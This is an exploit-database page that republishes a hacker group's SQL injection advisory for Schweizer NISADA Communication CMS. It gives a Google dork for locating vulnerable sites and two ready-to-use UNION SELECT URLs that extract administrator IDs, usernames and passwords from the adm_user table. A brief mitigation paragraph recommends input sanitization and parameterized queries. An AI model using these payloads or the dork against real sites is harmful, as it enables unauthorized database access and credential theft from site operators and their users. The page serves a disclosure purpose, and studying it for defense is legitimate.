header-logo
Suggest Exploit
vendor:
Schweizer NISADA Communication CMS
by:
Dr.0rYX and Cr3w-DZ
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Schweizer NISADA Communication CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Schweizer NISADA Communication CMS SQL Injection Vulnerability

An SQL injection vulnerability exists in Schweizer NISADA Communication CMS. An attacker can send a maliciously crafted HTTP request to the vulnerable server, which can allow the attacker to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Developers should always sanitize user input to prevent SQL injection attacks. Additionally, they should use parameterized queries to prevent malicious code from being executed.
Source

Exploit-DB raw data:

                                                  ALGERIAN HACKER
    **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            Schweizer NISADA Communication CMS SQL Injection Vulnerability
  [!] Author    : Dr.0rYX and Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de<mailto:vx3@hotmail.de>  &  Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://www.nisada.ch/
  [+] script   : Schweizer NISADA Communication CMS
  [+] Download : http://www.nisada.ch/contact.aspx (sell script )
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"/CMS/page.php?p="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/cms/page.php?p=1&img=[N.A.S.T ]



  [ Exploit ]

  http://server/cms/page.php?p=1&img=-1+UNION+ALL+select+1,2,3,4,5,GROUP_concat(CONVERT(num USING utf8),0x3a,CONVERT(user USINGutf8),0x3a,CONVERT(pswd USING utf8)),7,8,9,10,11,12,13,14+from+adm_user


  [ ExOMPLE ]
  http://server/cms/page.php?p=1&img=-207+UNION+ALL+select+1,2,3,4,5,GROUP_concat%28CONVERT%28num%20USING%20utf8%29,0x3a,CONVERT%28user%20USING%20utf8%29,0x3a,CONVERT%28pswd%20USING%20utf8%29%29,7,8,9,10,11,12,13,14+from+adm_user

  [  GReet ]

  [+] :claw ,xCv-DZ , HIS0K4 ,le0n ,www.arab-zone.org , exploit-db.com , ALL HACKERS MUSLIMS